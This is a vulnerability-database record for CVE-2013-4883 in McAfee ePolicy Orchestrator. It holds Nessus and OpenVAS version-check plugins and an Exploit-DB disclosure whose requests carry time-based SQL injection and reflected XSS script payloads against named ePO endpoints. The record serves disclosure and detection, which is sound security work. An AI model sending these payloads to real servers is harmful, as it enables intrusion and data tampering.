ID CVE-2013-4883 Type cve Reporter cve@mitre.org Modified 2013-08-22T06:54:00
Description
Multiple cross-site scripting (XSS) vulnerabilities in McAfee ePolicy Orchestrator 4.6.6 and earlier, and the ePO Extension for the McAfee Agent (MA) 4.5 through 4.6, allow remote attackers to inject arbitrary web script or HTML via the (1) instanceId parameter to core/loadDisplayType.do; (2) instanceId or (3) monitorUrl parameter to console/createDashboardContainer.do; uid parameter to (4) ComputerMgmt/sysDetPanelBoolPie.do or (5) ComputerMgmt/sysDetPanelSummary.do; (6) uid, (7) orion.user.security.token, or (8) ajaxMode parameter to ComputerMgmt/sysDetPanelQry.do; or (9) uid, (10) orion.user.security.token, or (11) ajaxMode parameter to ComputerMgmt/sysDetPanelSummary.do.
{"nessus": [{"lastseen": "2021-01-01T03:45:58", "description": "According to its self-reported version, the version of McAfee ePolicy\nOrchestrator (ePO) running on the remote host is 4.6.6 or earlier, and\ntherefore, has multiple reflected cross-site scripting vulnerabilities. \nAn attacker could exploit any of these issues by tricking a user into\nrequesting a specially crafted URL, resulting in arbitrary script code\nexecution.", "edition": 25, "published": "2013-07-17T00:00:00", "title": "McAfee ePolicy Orchestrator < 4.6.7 Multiple XSS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4883"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mcafee:epolicy_orchestrator"], "id": "MCAFEE_EPO_KB78824.NASL", "href": "https://www.tenable.com/plugins/nessus/68933", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68933);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\"CVE-2013-4883\");\n script_bugtraq_id(61422);\n script_xref(name:\"EDB-ID\", value:\"26807\");\n\n script_name(english:\"McAfee ePolicy Orchestrator < 4.6.7 Multiple XSS\");\n script_summary(english:\"ePO App Server version check\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A security management application on the remote host has multiple\ncross-site scripting vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of McAfee ePolicy\nOrchestrator (ePO) running on the remote host is 4.6.6 or earlier, and\ntherefore, has multiple reflected cross-site scripting vulnerabilities. 
\nAn attacker could exploit any of these issues by tricking a user into\nrequesting a specially crafted URL, resulting in arbitrary script code\nexecution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2013/Jul/80\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=KB78824\");\n script_set_attribute(attribute:\"solution\", value:\n\"There is no solution available at this time.\n\nMcAfee plans on fixing these vulnerabilities in ePO version 4.6.7, which\nis scheduled to be released in late Q3 2013.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:epolicy_orchestrator\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mcafee_epo_app_server_detect.nasl\");\n script_require_keys(\"www/epo_app_server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:8443);\ninstall = get_install_from_kb(appname:'epo_app_server', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nver = install['ver'];\nurl = build_url(qs:dir, port:port);\n\n# this should never be true but this code will be defensive anyway\nif (ver == UNKNOWN_VER)\n audit(AUDIT_UNKNOWN_WEB_APP_VER, 'ePO Application Server', url);\n\n# KB78824 says 4.6.6 and earlier are affected. It doesn't explicitly\n# say that only 4.6.x is affected, so the plugin will flag all earlier versions\nfix = '4.6.7';\nif (ver_compare(ver:ver, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'ePO Application Server', url, ver);\n\nset_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix + ' (release scheduled for late Q3 2013)\\n';\n security_warning(port:port, extra:report);\n}\nelse security_warning(port);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2020-04-23T19:06:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4882", "CVE-2013-4883"], "description": "This host is running McAfee ePolicy Orchestrator and is prone to multiple\nvulnerabilities.", "modified": "2020-04-21T00:00:00", "published": "2013-08-09T00:00:00", "id": "OPENVAS:1361412562310803865", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803865", "type": "openvas", "title": "McAfee ePolicy Orchestrator (ePO) Multiple Vulnerabilities-02 August13", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# McAfee ePolicy 
Orchestrator (ePO) Multiple Vulnerabilities-02 August13\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mcafee:epolicy_orchestrator\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803865\");\n script_version(\"2020-04-21T11:03:03+0000\");\n script_cve_id(\"CVE-2013-4882\", \"CVE-2013-4883\");\n script_bugtraq_id(61421, 61422);\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-21 11:03:03 +0000 (Tue, 21 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-08-09 15:40:39 +0530 (Fri, 09 Aug 2013)\");\n script_name(\"McAfee ePolicy Orchestrator (ePO) Multiple Vulnerabilities-02 August13\");\n\n script_tag(name:\"summary\", value:\"This host is running McAfee ePolicy Orchestrator and is prone to multiple\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"solution\", value:\"Upgrade to McAfee ePolicy Orchestrator version 4.5.7 or higher.\");\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"insight\", value:\"Multiple flaw are due to improper sanitation of user supplied input via,\n\n - 'instanceId' parameter upon submission to the /core/loadDisplayType.do\n script.\n\n - 'instanceId', 'orion.user.security.token', and 'ajaxMode' parameters upon\n submission to the /console/createDashboardContainer.do script.\n\n - 'uid' parameter upon submission to the /core/showRegisteredTypeDetails.do\n and /ComputerMgmt/sysDetPanelBoolPie.do scripts.\n\n - 'uid', 'orion.user.security.token', and 'ajaxMode' parameters upon submission\n to the /ComputerMgmt/sysDetPanelSummary.do and /ComputerMgmt/sysDetPanelQry.do\n scripts.\");\n script_tag(name:\"affected\", value:\"McAfee ePolicy Orchestrator (ePO) version 4.6.6 and earlier\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute arbitrary HTML\nor script code in a user's browser session in the context of an affected\nsite and inject or manipulate SQL queries in the back-end database, allowing\nfor the manipulation or disclosure of arbitrary data.\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/54143\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/26807\");\n script_xref(name:\"URL\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=KB78824\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_mcafee_epolicy_orchestrator_detect.nasl\");\n script_mandatory_keys(\"mcafee_ePO/installed\");\n script_require_ports(\"Services/www\", 8443);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!vers = get_app_version(cpe:CPE, port:port))\n 
exit(0);\n\nif(version_is_less(version:vers, test_version:\"4.6.7\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"4.6.7\");\n security_message(port:port, data:report);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T04:25:42", "description": "McAfee ePO 4.6.6 - Multiple Vulnerabilities. CVE-2013-4882,CVE-2013-4883. Webapps exploit for windows platform", "published": "2013-07-13T00:00:00", "type": "exploitdb", "title": "McAfee ePO 4.6.6 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-4882", "CVE-2013-4883"], "modified": "2013-07-13T00:00:00", "id": "EDB-ID:26807", "href": "https://www.exploit-db.com/exploits/26807/", "sourceData": "Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC\r\n\r\n\r\nMultiple vulnerabilities in McAfee ePO 4.6.6\r\n \r\nAffected Product:\r\nMcAfee ePO 4.6.6 Build 176 & (potentially) earlier versions\r\n \r\nTimeline:\r\n \r\n08 June 2013 - Vulnerability found\r\n12 June 2013 - Vendor informed\r\n12 June 2013 - Vendor replied/confirmed & opened service ticket\r\n12 July 2013 - Vendor responded with dates for solutions\r\n \r\nCredits:\r\nNuri Fattah of NATO / NCIRC (www.ncirc.nato.int)\r\n \r\nCVE: To be assigned\r\n \r\nNCIRC ID: NCIRC-2013127-01\r\n \r\nDescription:\r\nMultiple vulnerabilities, such as Cross-Site Scripting (XSS) and SQL\r\ninjection were identified in the latest version of McAfee ePO (4.6.6).\r\nAll identified vulnerabilities were discovered post authentication.\r\n \r\n\r\nVulnerability Details:\r\n \r\n1. SQL injection\r\n\r\na. GET\r\n/core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid=6waitf\r\nor%20delay'0%3a0%3a20'--\r\n&index=0&datasourceID=&orion.user.security.token=2LoWTAOfWJ4ZCjxY&ajax\r\nMode=standard HTTP/1.1\r\n\r\nb. 
/EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer\r\n&uid=1;%20WAITFOR%20DELAY%20'0:0:0';--\r\n&datasourceID=ListDataSource.orion.dashboard.chart.datasource.core.queryFactory\r\n%3Aquery.2&index=0 HTTP/1.1\r\n\r\nMcAfee Solution:\r\n\r\nItem \"a\" will be addressed in ePO 4.6.7 due out in late Q3 2013.\r\nItem \"b\" has been addressed per Security Bulletin SB10043.\r\n(https://kc.mcafee.com/corporate/index?page=3Dcontent&id=3DSB10043)\r\n \r\n \r\n\r\n\r\n2. Reflected XSS\r\na. POST /core/loadDisplayType.do HTTP/1.1=20\r\ndisplayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard\r\n \r\nb. POST /console/createDashboardContainer.do HTTP/1.1\r\ndisplayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard\r\n \r\nc. POST /console/createDashboardContainer.do HTTP/1.1\r\nelementId=3DcustomURL.dashboard.factory%3Ainstance&index=3D2&pageid=3D30&\r\nwidth=3D1118&height=3D557&refreshInterval=3D5&refreshIntervalUnit=3DMIN&filteringEnabled=3Dfalse&mo\r\nnitorUrl=3Dhttp%3A%2F%2Fwww.xxxx.com\"/></iframe><script>alert(111057)</script>&orion.user.sec\r\nurity.token=3D9BslgbJEv2JqQy3k&ajaxMode=3Dstandard\r\n \r\nd. GET /ComputerMgmt/sysDetPanelBoolPie.do?uid=1\";</script><script>alert(147981)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1\r\n \r\ne. GET /ComputerMgmt/sysDetPanelQry.do?uid=<script>alert(149031)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1\r\n \r\nf. GET /ComputerMgmt/sysDetPanelQry.do?uid=>\"'><script>alert(30629)</script>&orion.user.security.token=>\"'><script>alert(30629)</script>&ajaxMode=>\"'><script>alert(30629)</script> HTTP/1.1\r\n \r\ng. 
GET /ComputerMgmt/sysDetPanelSummary.do?uid=<script>alert(146243)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1\r\n \r\n\r\nh. GET /ComputerMgmt/sysDetPanelSummary.do?uid=>\"'><script>alert(30565)</script>&orion.user.security.token=>\"'><script>alert(30565)</script>&ajaxMode=>\"'><script>alert(30565)</script> HTTP/1.1\r\n \r\n\r\nMcAfee Solution:\r\n\r\nEach of these items will be addressed in ePO 4.6.7 due out in late Q3\r\n2013.\r\n\r\n \r\n\r\n\r\nNuri FATTAH\r\nCTR\r\nNATO Communications and Information Agency\r\nEngineering & Vulnerability Management Sections\r\nNATO Information Assurance Technical Centre\r\nSHAPE, 7010 Mons, Belgium\r\nT: +32 6544 6140 F: +32 6544 5414\r\nSHAPE NCN: 254 6140\r\nE: nuri.fattah@ncirc.nato.int W: www.ncirc.nato.int", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26807/"}]}